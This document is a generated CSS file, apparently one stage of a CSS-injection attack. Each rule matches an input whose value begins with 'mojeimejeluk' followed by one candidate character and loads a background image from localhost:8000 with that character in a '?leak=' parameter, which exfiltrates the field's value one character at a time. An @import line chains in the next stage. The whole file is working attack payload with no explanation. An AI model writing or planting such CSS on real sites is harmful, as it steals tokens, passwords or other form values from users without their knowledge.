@import url("http://localhost:8000/?l=14");
input[value="mojeimejeluk!"] {background: url("http://localhost:8000/?leak=!&q=0.8839808916020886");}
input[value="mojeimejeluk\""] {background: url("http://localhost:8000/?leak=\"&q=0.6950184843777405");}
input[value="mojeimejeluk#"] {background: url("http://localhost:8000/?leak=#&q=0.34207087861133956");}
input[value="mojeimejeluk$"] {background: url("http://localhost:8000/?leak=$&q=0.9538861868708122");}
input[value="mojeimejeluk%"] {background: url("http://localhost:8000/?leak=%&q=0.5931882840639291");}
input[value="mojeimejeluk&"] {background: url("http://localhost:8000/?leak=&&q=0.703219046510347");}
input[value="mojeimejeluk'"] {background: url("http://localhost:8000/?leak='&q=0.9141120514470362");}
input[value="mojeimejeluk("] {background: url("http://localhost:8000/?leak=(&q=0.6133872799619962");}
input[value="mojeimejeluk)"] {background: url("http://localhost:8000/?leak=)&q=0.2950038473269214");}
input[value="mojeimejeluk*"] {background: url("http://localhost:8000/?leak=*&q=0.7601548539620135");}
input[value="mojeimejeluk+"] {background: url("http://localhost:8000/?leak=+&q=0.9473704731088579");}
input[value="mojeimejeluk,"] {background: url("http://localhost:8000/?leak=,&q=0.5330091614961103");}
input[value="mojeimejeluk-"] {background: url("http://localhost:8000/?leak=-&q=0.13288886095245478");}
input[value="mojeimejeluk."] {background: url("http://localhost:8000/?leak=.&q=0.015863347906675873");}
input[value="mojeimejeluk/"] {background: url("http://localhost:8000/?leak=/&q=0.21993596804608417");}
input[value="mojeimejeluk0"] {background: url("http://localhost:8000/?leak=0&q=0.03366644432808785");}
input[value="mojeimejeluk1"] {background: url("http://localhost:8000/?leak=1&q=0.7381452260189423");}
input[value="mojeimejeluk2"] {background: url("http://localhost:8000/?leak=2&q=0.40731106026765773");}
input[value="mojeimejeluk3"] {background: url("http://localhost:8000/?leak=3&q=0.5012829709031994");}
input[value="mojeimejeluk4"] {background: url("http://localhost:8000/?leak=4&q=0.23591254178538112");}
input[value="mojeimejeluk5"] {background: url("http://localhost:8000/?leak=5&q=0.05693550934591518");}
input[value="mojeimejeluk6"] {background: url("http://localhost:8000/?leak=6&q=0.19334213270882938");}
input[value="mojeimejeluk7"] {background: url("http://localhost:8000/?leak=7&q=0.6356620169909228");}
input[value="mojeimejeluk8"] {background: url("http://localhost:8000/?leak=8&q=0.13667277120995136");}
input[value="mojeimejeluk9"] {background: url("http://localhost:8000/?leak=9&q=0.01698642981447307");}
input[value="mojeimejeluk:"] {background: url("http://localhost:8000/?leak=:&q=0.2785630920971325");}
input[value="mojeimejeluk;"] {background: url("http://localhost:8000/?leak=;&q=0.46570946950272396");}
input[value="mojeimejeluk<"] {background: url("http://localhost:8000/?leak=<&q=0.24410520483897824");}
input[value="mojeimejeluk="] {background: url("http://localhost:8000/?leak==&q=0.2965224996360014");}
input[value="mojeimejeluk>"] {background: url("http://localhost:8000/?leak=>&q=0.9992121395940867");}
input[value="mojeimejeluk?"] {background: url("http://localhost:8000/?leak=?&q=0.6740025342254858");}
input[value="mojeimejeluk@"] {background: url("http://localhost:8000/?leak=@&q=0.8198221297274768");}
input[value="mojeimejelukA"] {background: url("http://localhost:8000/?leak=A&q=0.781356647428721");}
input[value="mojeimejelukB"] {background: url("http://localhost:8000/?leak=B&q=0.8312413858245904");}
input[value="mojeimejelukC"] {background: url("http://localhost:8000/?leak=C&q=0.012843735053357896");}
input[value="mojeimejelukD"] {background: url("http://localhost:8000/?leak=D&q=0.29412351950530824");}
input[value="mojeimejelukE"] {background: url("http://localhost:8000/?leak=E&q=0.18613468517081655");}
input[value="mojeimejelukF"] {background: url("http://localhost:8000/?leak=F&q=0.583046400478487");}
input[value="mojeimejelukG"] {background: url("http://localhost:8000/?leak=G&q=0.9753279156422945");}
input[value="mojeimejelukH"] {background: url("http://localhost:8000/?leak=H&q=0.16756001292665013");}
input[value="mojeimejelukI"] {background: url("http://localhost:8000/?leak=I&q=0.4665025185400129");}
input[value="mojeimejelukJ"] {background: url("http://localhost:8000/?leak=J&q=0.20246218417914386");}
input[value="mojeimejelukK"] {background: url("http://localhost:8000/?leak=K&q=0.6677227563154038");}
input[value="mojeimejelukL"] {background: url("http://localhost:8000/?leak=L&q=0.0216427553139511");}
input[value="mojeimejelukM"] {background: url("http://localhost:8000/?leak=M&q=0.6660759233821543");}
input[value="mojeimejelukN"] {background: url("http://localhost:8000/?leak=N&q=0.9599242587976065");}
input[value="mojeimejelukO"] {background: url("http://localhost:8000/?leak=O&q=0.4015955496337982");}
input[value="mojeimejelukP"] {background: url("http://localhost:8000/?leak=P&q=0.49665068517851885");}
input[value="mojeimejelukQ"] {background: url("http://localhost:8000/?leak=Q&q=0.5195660104118001");}
input[value="mojeimejelukR"] {background: url("http://localhost:8000/?leak=R&q=0.17615745408912664");}
input[value="mojeimejelukS"] {background: url("http://localhost:8000/?leak=S&q=0.6266658241886951");}
input[value="mojeimejelukT"] {background: url("http://localhost:8000/?leak=T&q=0.598018541317189");}
input[value="mojeimejelukU"] {background: url("http://localhost:8000/?leak=U&q=0.5944705753976793");}
input[value="mojeimejelukV"] {background: url("http://localhost:8000/?leak=V&q=0.8218357377295828");}
input[value="mojeimejelukW"] {background: url("http://localhost:8000/?leak=W&q=0.11358069010648064");}
input[value="mojeimejelukX"] {background: url("http://localhost:8000/?leak=X&q=0.5576611117298664");}
input[value="mojeimejelukY"] {background: url("http://localhost:8000/?leak=Y&q=0.7424776921206204");}
input[value="mojeimejelukZ"] {background: url("http://localhost:8000/?leak=Z&q=0.9605226176205581");}
input[value="mojeimejeluk["] {background: url("http://localhost:8000/?leak=[&q=0.011480422463118645");}
input[value="mojeimejeluk\\"] {background: url("http://localhost:8000/?leak=\\&q=0.41393764152635715");}
input[value="mojeimejeluk]"] {background: url("http://localhost:8000/?leak=]&q=0.9254084270896907");}
input[value="mojeimejeluk^"] {background: url("http://localhost:8000/?leak=^&q=0.2817297301216084");}
input[value="mojeimejeluk_"] {background: url("http://localhost:8000/?leak=_&q=0.9678341604319254");}
input[value="mojeimejeluk`"] {background: url("http://localhost:8000/?leak=`&q=0.21936637671605408");}
input[value="mojeimejeluka"] {background: url("http://localhost:8000/?leak=a&q=0.4322802076852992");}
input[value="mojeimejelukb"] {background: url("http://localhost:8000/?leak=b&q=0.9621243192081235");}
input[value="mojeimejelukc"] {background: url("http://localhost:8000/?leak=c&q=0.15805141594905292");}
input[value="mojeimejelukd"] {background: url("http://localhost:8000/?leak=d&q=0.7741902292017946");}
input[value="mojeimejeluke"] {background: url("http://localhost:8000/?leak=e&q=0.5590789271682641");}
input[value="mojeimejelukf"] {background: url("http://localhost:8000/?leak=f&q=0.6713256795885993");}
input[value="mojeimejelukg"] {background: url("http://localhost:8000/?leak=g&q=0.37576008692949436");}
input[value="mojeimejelukh"] {background: url("http://localhost:8000/?leak=h&q=0.754551627122942");}
input[value="mojeimejeluki"] {background: url("http://localhost:8000/?leak=i&q=0.9108778939492885");}
input[value="mojeimejelukj"] {background: url("http://localhost:8000/?leak=j&q=0.1617108409635588");}
input[value="mojeimejelukk"] {background: url("http://localhost:8000/?leak=k&q=0.5171350359258693");}
input[value="mojeimejelukl"] {background: url("http://localhost:8000/?leak=l&q=0.3203022448607855");}
input[value="mojeimejelukm"] {background: url("http://localhost:8000/?leak=m&q=0.07994214815057954");}
input[value="mojeimejelukn"] {background: url("http://localhost:8000/?leak=n&q=0.958682262860407");}
input[value="mojeimejeluko"] {background: url("http://localhost:8000/?leak=o&q=0.12229962992093113");}
input[value="mojeimejelukp"] {background: url("http://localhost:8000/?leak=p&q=0.16309285188827816");}
input[value="mojeimejelukq"] {background: url("http://localhost:8000/?leak=q&q=0.03906561227163219");}
input[value="mojeimejelukr"] {background: url("http://localhost:8000/?leak=r&q=0.7964637472795384");}
input[value="mojeimejeluks"] {background: url("http://localhost:8000/?leak=s&q=0.015225916111865967");}
input[value="mojeimejelukt"] {background: url("http://localhost:8000/?leak=t&q=0.5595507224869443");}
input[value="mojeimejeluku"] {background: url("http://localhost:8000/?leak=u&q=0.6789772051011793");}
input[value="mojeimejelukv"] {background: url("http://localhost:8000/?leak=v&q=0.12072837422269811");}
input[value="mojeimejelukw"] {background: url("http://localhost:8000/?leak=w&q=0.9727178494097617");}
input[value="mojeimejelukx"] {background: url("http://localhost:8000/?leak=x&q=0.5692897182944354");}
input[value="mojeimejeluky"] {background: url("http://localhost:8000/?leak=y&q=0.7878186233674147");}
input[value="mojeimejelukz"] {background: url("http://localhost:8000/?leak=z&q=0.38895022891899744");}
input[value="mojeimejeluk{"] {background: url("http://localhost:8000/?leak={&q=0.3639540257456797");}
input[value="mojeimejeluk|"] {background: url("http://localhost:8000/?leak=|&q=0.7924345617573638");}
input[value="mojeimejeluk}"] {background: url("http://localhost:8000/?leak=}&q=0.2894663659413559");}
input[value="mojeimejeluk~"] {background: url("http://localhost:8000/?leak=~&q=0.15732772289614205");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.32049041626513297");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.6823618985740927");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.039236260971295955");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.7030044327337965");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.3440009298058593");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.42042592737679074");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.8433980079834951");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.03785799549668223");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.7527275609816395");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.5613728373967053");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.21185453180872238");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.7109580139465628");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.13162716320768353");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.1086199965343928");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.7262147369838128");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.9568769621050139");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.644379344075767");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.8534397284957127");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.3440299770719466");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.2455689012730018");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.34160561289749247");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.2146308583287846");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.15353456701367718");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.570080832839059");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.605780564732195");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.7952841814609968");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.6405600819129569");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.1911105996628384");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.8364029953675574");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.33234293089479294");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.6671403722508864");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.09524133854117278");}
input[value="mojeimejeluk"] {background: url("http://localhost:8000/?leak=&q=0.5208570772379519");}
input[value="mojeimejeluk "] {background: url("http://localhost:8000/?leak= &q=0.444891330230768");}
input[value="mojeimejeluk¡"] {background: url("http://localhost:8000/?leak=¡&q=0.04667864869934979");}
input[value="mojeimejeluk¢"] {background: url("http://localhost:8000/?leak=¢&q=0.22838909925093054");}
input[value="mojeimejeluk£"] {background: url("http://localhost:8000/?leak=£&q=0.12625468492552816");}
input[value="mojeimejeluk¤"] {background: url("http://localhost:8000/?leak=¤&q=0.6006130337128988");}
input[value="mojeimejeluk¥"] {background: url("http://localhost:8000/?leak=¥&q=0.6470514612571214");}
input[value="mojeimejeluk¦"] {background: url("http://localhost:8000/?leak=¦&q=0.2875125079850638");}
input[value="mojeimejeluk§"] {background: url("http://localhost:8000/?leak=§&q=0.031069181291685233");}
input[value="mojeimejeluk¨"] {background: url("http://localhost:8000/?leak=¨&q=0.5063364844362825");}
input[value="mojeimejeluk©"] {background: url("http://localhost:8000/?leak=©&q=0.23431637632212987");}
input[value="mojeimejelukª"] {background: url("http://localhost:8000/?leak=ª&q=0.9444895096080448");}
input[value="mojeimejeluk«"] {background: url("http://localhost:8000/?leak=«&q=0.5570271173465382");}
input[value="mojeimejeluk¬"] {background: url("http://localhost:8000/?leak=¬&q=0.6911391130769999");}
input[value="mojeimejeluk­"] {background: url("http://localhost:8000/?leak=­&q=0.412649585178426");}
input[value="mojeimejeluk®"] {background: url("http://localhost:8000/?leak=®&q=0.129029091171174");}
input[value="mojeimejeluk¯"] {background: url("http://localhost:8000/?leak=¯&q=0.017151957754495184");}
input[value="mojeimejeluk°"] {background: url("http://localhost:8000/?leak=°&q=0.2132860844260811");}
input[value="mojeimejeluk±"] {background: url("http://localhost:8000/?leak=±&q=0.5904405761920271");}
input[value="mojeimejeluk²"] {background: url("http://localhost:8000/?leak=²&q=0.740650102364611");}
input[value="mojeimejeluk³"] {background: url("http://localhost:8000/?leak=³&q=0.5872806974030729");}
input[value="mojeimejeluk´"] {background: url("http://localhost:8000/?leak=´&q=0.80667209117501");}
input[value="mojeimejelukµ"] {background: url("http://localhost:8000/?leak=µ&q=0.8564536975139696");}
input[value="mojeimejeluk¶"] {background: url("http://localhost:8000/?leak=¶&q=0.8352542793179403");}
input[value="mojeimejeluk·"] {background: url("http://localhost:8000/?leak=·&q=0.9489738898840476");}
input[value="mojeimejeluk¸"] {background: url("http://localhost:8000/?leak=¸&q=0.30215749440790995");}
input[value="mojeimejeluk¹"] {background: url("http://localhost:8000/?leak=¹&q=0.7916893923402355");}
input[value="mojeimejelukº"] {background: url("http://localhost:8000/?leak=º&q=0.42420924726863296");}
input[value="mojeimejeluk»"] {background: url("http://localhost:8000/?leak=»&q=0.9823049886790132");}
input[value="mojeimejeluk¼"] {background: url("http://localhost:8000/?leak=¼&q=0.9576454920833968");}
input[value="mojeimejeluk½"] {background: url("http://localhost:8000/?leak=½&q=0.8398140727700223");}
input[value="mojeimejeluk¾"] {background: url("http://localhost:8000/?leak=¾&q=0.03596211895171719");}
input[value="mojeimejeluk¿"] {background: url("http://localhost:8000/?leak=¿&q=0.2470353752316803");}
input[value="mojeimejelukÀ"] {background: url("http://localhost:8000/?leak=À&q=0.6176111806016731");}
input[value="mojeimejelukÁ"] {background: url("http://localhost:8000/?leak=Á&q=0.4873765254675937");}
input[value="mojeimejelukÂ"] {background: url("http://localhost:8000/?leak=Â&q=0.8296500482703384");}
input[value="mojeimejelukÃ"] {background: url("http://localhost:8000/?leak=Ã&q=0.13037779022162055");}
input[value="mojeimejelukÄ"] {background: url("http://localhost:8000/?leak=Ä&q=0.9549437348002339");}
input[value="mojeimejelukÅ"] {background: url("http://localhost:8000/?leak=Å&q=0.46642759954428437");}
input[value="mojeimejelukÆ"] {background: url("http://localhost:8000/?leak=Æ&q=0.5710456297296878");}
input[value="mojeimejelukÇ"] {background: url("http://localhost:8000/?leak=Ç&q=0.7414271088722626");}
input[value="mojeimejelukÈ"] {background: url("http://localhost:8000/?leak=È&q=0.6645141254244291");}
input[value="mojeimejelukÉ"] {background: url("http://localhost:8000/?leak=É&q=0.5929567417253299");}
input[value="mojeimejelukÊ"] {background: url("http://localhost:8000/?leak=Ê&q=0.5279252052246404");}
input[value="mojeimejelukË"] {background: url("http://localhost:8000/?leak=Ë&q=0.27845152757783453");}
input[value="mojeimejelukÌ"] {background: url("http://localhost:8000/?leak=Ì&q=0.05797865115446954");}
input[value="mojeimejelukÍ"] {background: url("http://localhost:8000/?leak=Í&q=0.5085549633029456");}
input[value="mojeimejelukÎ"] {background: url("http://localhost:8000/?leak=Î&q=0.05309898734173224");}
input[value="mojeimejelukÏ"] {background: url("http://localhost:8000/?leak=Ï&q=0.73161407456356");}
input[value="mojeimejelukÐ"] {background: url("http://localhost:8000/?leak=Ð&q=0.43085822469458246");}
input[value="mojeimejelukÑ"] {background: url("http://localhost:8000/?leak=Ñ&q=0.16631312275965882");}
input[value="mojeimejelukÒ"] {background: url("http://localhost:8000/?leak=Ò&q=0.34050079484996165");}
input[value="mojeimejelukÓ"] {background: url("http://localhost:8000/?leak=Ó&q=0.5144831904580323");}
input[value="mojeimejelukÔ"] {background: url("http://localhost:8000/?leak=Ô&q=0.2497484600119988");}
input[value="mojeimejelukÕ"] {background: url("http://localhost:8000/?leak=Õ&q=0.9428043735996361");}
input[value="mojeimejelukÖ"] {background: url("http://localhost:8000/?leak=Ö&q=0.7756511080733541");}
input[value="mojeimejeluk×"] {background: url("http://localhost:8000/?leak=×&q=0.9306641090786798");}
input[value="mojeimejelukØ"] {background: url("http://localhost:8000/?leak=Ø&q=0.927055624229342");}
input[value="mojeimejelukÙ"] {background: url("http://localhost:8000/?leak=Ù&q=0.7346304838399766");}
input[value="mojeimejelukÚ"] {background: url("http://localhost:8000/?leak=Ú&q=0.24147944794847342");}
input[value="mojeimejelukÛ"] {background: url("http://localhost:8000/?leak=Û&q=0.548283101934121");}
input[value="mojeimejelukÜ"] {background: url("http://localhost:8000/?leak=Ü&q=0.6253690336640916");}
input[value="mojeimejelukÝ"] {background: url("http://localhost:8000/?leak=Ý&q=0.9729076464142175");}
input[value="mojeimejelukÞ"] {background: url("http://localhost:8000/?leak=Þ&q=0.8153861257991211");}
input[value="mojeimejelukß"] {background: url("http://localhost:8000/?leak=ß&q=0.08616122585459562");}
input[value="mojeimejelukà"] {background: url("http://localhost:8000/?leak=à&q=0.7580772011836252");}
input[value="mojeimejeluká"] {background: url("http://localhost:8000/?leak=á&q=0.7742759461287694");}
input[value="mojeimejelukâ"] {background: url("http://localhost:8000/?leak=â&q=0.016533020663941578");}
input[value="mojeimejelukã"] {background: url("http://localhost:8000/?leak=ã&q=0.4372918553990437");}
input[value="mojeimejelukä"] {background: url("http://localhost:8000/?leak=ä&q=0.37155104133685724");}
input[value="mojeimejelukå"] {background: url("http://localhost:8000/?leak=å&q=0.7760059734555744");}
input[value="mojeimejelukæ"] {background: url("http://localhost:8000/?leak=æ&q=0.562483926170428");}
input[value="mojeimejelukç"] {background: url("http://localhost:8000/?leak=ç&q=0.30807013578898945");}
input[value="mojeimejelukè"] {background: url("http://localhost:8000/?leak=è&q=0.1962698029277521");}
input[value="mojeimejeluké"] {background: url("http://localhost:8000/?leak=é&q=0.6260834613827719");}
input[value="mojeimejelukê"] {background: url("http://localhost:8000/?leak=ê&q=0.5100455456363882");}
input[value="mojeimejelukë"] {background: url("http://localhost:8000/?leak=ë&q=0.14249798622665177");}
input[value="mojeimejelukì"] {background: url("http://localhost:8000/?leak=ì&q=0.9523081004246963");}
input[value="mojeimejelukí"] {background: url("http://localhost:8000/?leak=í&q=0.16450746228725532");}
input[value="mojeimejelukî"] {background: url("http://localhost:8000/?leak=î&q=0.3746044592978812");}
input[value="mojeimejelukï"] {background: url("http://localhost:8000/?leak=ï&q=0.879214145225913");}
input[value="mojeimejelukð"] {background: url("http://localhost:8000/?leak=ð&q=0.33376954712762985");}
input[value="mojeimejelukñ"] {background: url("http://localhost:8000/?leak=ñ&q=0.3156524720734766");}
input[value="mojeimejelukò"] {background: url("http://localhost:8000/?leak=ò&q=0.6958448504827872");}
input[value="mojeimejelukó"] {background: url("http://localhost:8000/?leak=ó&q=0.6035642834910562");}
input[value="mojeimejelukô"] {background: url("http://localhost:8000/?leak=ô&q=0.28136782459971643");}
input[value="mojeimejelukõ"] {background: url("http://localhost:8000/?leak=õ&q=0.668527961014501");}
input[value="mojeimejelukö"] {background: url("http://localhost:8000/?leak=ö&q=0.7393827364484229");}
input[value="mojeimejeluk÷"] {background: url("http://localhost:8000/?leak=÷&q=0.944842376829869");}
input[value="mojeimejelukø"] {background: url("http://localhost:8000/?leak=ø&q=0.059219468963023214");}
input[value="mojeimejelukù"] {background: url("http://localhost:8000/?leak=ù&q=0.3785425121856034");}
input[value="mojeimejelukú"] {background: url("http://localhost:8000/?leak=ú&q=0.44938530022648826");}
input[value="mojeimejelukû"] {background: url("http://localhost:8000/?leak=û&q=0.5593900081420169");}
input[value="mojeimejelukü"] {background: url("http://localhost:8000/?leak=ü&q=0.25438459185315754");}
input[value="mojeimejeluký"] {background: url("http://localhost:8000/?leak=ý&q=0.5163045749566402");}
input[value="mojeimejelukþ"] {background: url("http://localhost:8000/?leak=þ&q=0.938063419773965");}
input[value="mojeimejelukÿ"] {background: url("http://localhost:8000/?leak=ÿ&q=0.5744856436539665");}
